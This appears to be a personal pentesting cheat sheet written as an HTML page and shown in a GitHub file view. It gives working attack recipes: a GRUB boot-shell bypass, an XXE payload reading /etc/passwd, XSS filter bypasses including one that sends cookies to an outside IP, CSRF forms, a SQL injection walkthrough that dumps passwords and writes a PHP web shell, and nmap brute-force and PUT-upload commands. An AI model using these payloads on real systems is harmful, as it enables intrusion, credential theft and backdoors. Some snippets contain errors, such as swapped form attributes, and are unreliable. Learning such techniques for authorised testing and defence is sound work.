-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexamples.html
More file actions
275 lines (254 loc) · 9.81 KB
/
examples.html
File metadata and controls
275 lines (254 loc) · 9.81 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Pentesting Ref | examples</title>
<link rel="stylesheet" href="css/style_examples.css">
<link href="https://fonts.googleapis.com/css2?family=Space+Mono:wght@400;700&display=swap" rel="stylesheet">
</head>
<body>
<main>
<h2>linux security flaws</h2>
<div class="box">
<h3>access shell without pass via grub</h3>
<p>on grub's screen, with the Os selected, press "e", and go to the kernel config line: </p>
<img src="ex_imgs/grub_shell.png">
<p>delete from the word "ro" to the end, as market in the picture, and add "wr init=/bin/bash", after that you will be granted a terminal with limited privileges:</p>
<img src="/ex_imgs/grub_shell_granted.jpg">
<p>OBS: you can run shell scripts this way</p>
</div>
<h2>injections</h2>
<div class="box">
<h3>XML injection</h3>
<p>example from a htb machine (bounty hunter): </p>
<code class="etc">
<?xml version="1.0" encoding="ISO-8859-1"?> <br>
<bugreport> <br>
<title> RCE </title> <br>
<cwe> CWE-434 </cwe> <br>
<cvss> 9 </cvss> <br>
<reward> 100 </reward> <br>
</bugreport>
</code>
<p>injected version, using file desclosure method: </p>
<code class="etc">
<?xml version="1.0" encoding="ISO-8859-1"?> <br>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <br>
<bugreport> <br>
<title> &xxe; </title> <br>
<cwe> CWE-434 </cwe> <br>
<cvss> 9 </cvss> <br>
<reward> 100 </reward> <br>
</bugreport>
</code>
<p>repair how we use <code class="inline etc">xxe</code> to get the passwd file, and the same name in <code class="inline etc"> <title> &xxe; </title></code> to display the file requested</p>
<a href="https://github.com/payloadbox/xxe-injection-payload-list">xml payloads</a>
</div>
<div class="box">
<h3>XSS injection</h3>
<p>consider the following code on a web server: </p>
<code class="etc">
if( is_set($_GET["name"]) ) <br>
<span class="spacer">aaaa</span>echo "Welcome, $_GET[name]"
</code>
<p>and the following request: </p>
<code class="etc">
http://localhost/welcome.php?name=<script>alert(document.cookie)</script>
</code>
<p>if it isn't a shitty code, it will have some protections, here are some ways to bypass it:</p>
<code class="etc">
http://localhost/welcome.php?name=<sCriPt>alert(document.cookie)</sCrIpT> <br>
http://localhost/welcome.php?name=<sc<script>ript>alert(document.cookie)</scri<script>pt> <br>
http://localhost/welcome.php?name=<script>window.location.href="http://192.168.0.104/index.php?cookie="+document.cookie;</script> <br>
</code>
</div>
<div class="box">
<h3>CSFR</h3>
<p>consider the following code on a web server, that changes the password of an account: </p>
<code class="etc">
<form method="change-pass.php" action="GET"> <br>
<span class="spacer">aaaa</span><input type="password" name="new_password"> <br>
<span class="spacer">aaaa</span><input type="password" name="new_password2"> <br>
<span class="spacer">aaaa</span><input type="submit"> <br>
</form> <br>
</code>
<p>if server is vulnerable, we can have the same form on a web server, and send to the same destination as the authentical one: </p>
<code class="etc">
<form method="site.com/change-pass.php" action="GET"> <br>
<span class="spacer">aaaa</span><input type="password" name="new_password" value="pwned"> <br>
<span class="spacer">aaaa</span><input type="password" name="new_password2" value="pwned"> <br>
<span class="spacer">aaaa</span><input type="submit"> <br>
</form> <br>
</code>
<p>pressing submit, we send the form to the website, not having any form of special privileges, repair how we use se the same form, but on a DIFFERENT website</p>
<p>if the params are sent via GET, it gets even more easy:</p>
<code class="etc">
<img src="/csrf/?user=johndoe&password=test123">
</code>
</div>
<div class="box">
<h3>SQL injection</h3>
<p>determining number of columns af actual table:</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1 %23'
</code>
<p>the browser shows an error, let's try adding the columns until we get a response</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3 %23'
http://store.com/login?name=' UNION ALL SELECT 1,2,3,4,5 %23'
</code>
<p>we got</p>
<code class="etc">
email: 4 <br>
password: 4 <br>
</code>
<p>we can now request the db name</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3,database(),5 %23'
</code>
<p>and get as response</p>
<code class="etc">
email: store_db <br>
password: 5
</code>
<p>now, request the table name: </p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3,table_name,5 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema="store_db" %23'
</code>
<p>response</p>
<code class="etc">
email: users
password: 6
</code>
<p>requesting columns name:</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3,column_name,5 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema="store_db" AND table_name ="users" %23'
</code>
<p>response</p>
<code class="etc">
email: id <br>
password: 5 <br>
email: name <br>
password: 5 <br>
email: username <br>
password: 5 <br>
email: email <br>
password: 5 <br>
email: password <br>
password: 5 <br>
</code>
<p>requesting values from columns:</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3,email,password FROM store_db.users %23'
</code>
<p>response (OBS: a password field will likely be)</p>
<code class="etc">
email: admin@store.com <br>
password: @dm1n <br>
email: contact@store.com <br>
password: ST@ff <br>
email: ghost@store.com <br>
password: !23$$ <br>
</code>
<br> <br>
<p>find directories wich normal user can upload files:</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3,load_file("/etc/apache2/sites-available/000-default.conf"),5 %23'
</code>
<p>response</p>
<code class="etc">
DocumetRoot /var/www/html
</code>
<p>upload a file:</p>
<code class="etc">
http://store.com/login?name=' UNION ALL SELECT 1,2,3,4,"<pre><?php system($_GET['cmd']) ?>" INTO OUTFILE "/var/www/html/pictures/backdoor.php" %23'
</code>
</div>
<h2>Nmap scripts</h2>
<div class="box">
<h3>mysql-brute</h3>
<p>MySQL brute force script</p>
<code class="etc">
userdb=<wordlist> <br>
passdb=<wordlist> <br>
brute.firstonly=<boolean> ── exits nmap after a match, default is false
</code>
<code>nmap -p 3306 testphp.vulnweb.com --script mysql-brute --script-args userdb=/usr/share/userlist,passdb=/usr/share/passlist</code>
</div>
<div class="box">
<h3>mysql-query</h3>
<p>script for query in MySQL</p>
<code class="etc">
mysql-query.query=<query> ── query to send<br>
mysql-query.username=<user> <br>
mysql-query.pass=<pass>
</code>
<code>nmap -p 3306 testphp.vulnweb.com --script mysql-query --script-args mysql-query.query='show databases,mysql-query.username=admin,mysql-query.password=admin</code>
</div>
<div class="box">
<h3>http-enum</h3>
<p>web server directory enum</p>
<code>nmap testphp.vulnweb.com -p 80 --script http-enum</code>
</div>
<div class="box">
<h3>http-put</h3>
<p>exploit web servers with PUT enabled, uploading a file</p>
<code class="etc">
http-put.file=<file> ── file to upload <br>
http-put.url=<url> ── upload in directory, and rename the file
</code>
<code>nmap testphp.vulnweb.com -p 80 --script http-put --script-args http-put.file=/root/reverse.php,http-put.url=/wp-config/upload</code>
</div>
<div class="box">
<h3>http-tamper</h3>
<p>exploits a misconfiguration where the path is only blocked via GET</p>
<code class="etc">
http-method-tamper.uri=<uri> ── possible misconfigurated path
</code>
<code>nmap testphp.vulnweb.com -p 80 --script http-method-tamper --script-args http-method-tamper.uri=/login</code>
</div>
<div class="box">
<h3>http-csrf</h3>
<p>scans fpr csrf vulnerability</p>
<code>nmap testphp.vulnweb.com -p 80 --script http-csrf</code>
</div>
<div class="box">
<h3>traceroute-geolocation</h3>
<p>see geolocation of host</p>
<code>nmap testphp.vulnweb.com -p 80 --traceroute --script traceroute-geolocation</code>
</div>
<div class="box">
<h3>http-waf-detect</h3>
<p>verifies firewalls in web servers</p>
<code class="etc">
http-waf-detect.aggro=<boolean> ── tries the hardest to detect, more aggressive
</code>
<code>nmap testphp.vulnweb.com -p 80 --script http-waf-detect</code>
</div>
<div class="box">
<h3>http-waf-fingerprint</h3>
<p>determines waf used</p>
<code class="etc">
http-waf-fingerprint.intensive ── tries the hardest to detect, more aggressive
</code>
<code>nmap testphp.vulnweb.com -p 80 --script http-waf-fingerprint</code>
</div>
<div class="box">
<h3>http-robots.txt</h3>
<p>searches for directories in robots.txt</p>
<code>nmap testphp.vulnweb.com -p 80 --script http-robots.txt</code>
</div>
<div class="box">
<h3>http-auth-finder</h3>
<p>finds auth pages</p>
<code class="etc">
http-auth-finder.maxdepth=<value> ── recursive depth, default is 3
</code>
<code>nmap testphp.vulnweb.com -p 80 --script http-auth-finder</code>
</div>
</main>
<aside></aside>
</body>
</html>